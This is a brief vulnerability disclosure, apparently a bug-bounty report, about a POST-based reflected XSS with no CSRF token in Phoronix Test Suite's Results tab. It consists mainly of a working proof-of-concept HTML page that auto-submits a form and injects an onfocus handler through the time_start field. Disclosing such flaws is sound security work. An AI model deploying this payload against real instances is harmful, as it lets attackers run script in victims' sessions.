Hi, i found a Reflected XSS vulnerability (POST based XSS + no CSRF token) in phoronix test suite, Results tab.
Install a local instance of phoronix
create a Search results form like this:
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8222/?results" method="POST">
<input type="hidden" name="time_start" value="2022-02-08"onfocus="confirm(origin)"autofocus="" />
<input type="hidden" name="time_end" value="2022-02-09" />
<input type="hidden" name="containing_tests" value="testt" />
<input type="hidden" name="result_limit" value="100" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
//
and send to victim. Victim click on the link resulting reflected cross site scripting.
This vulnerability is capable of Reflected XSS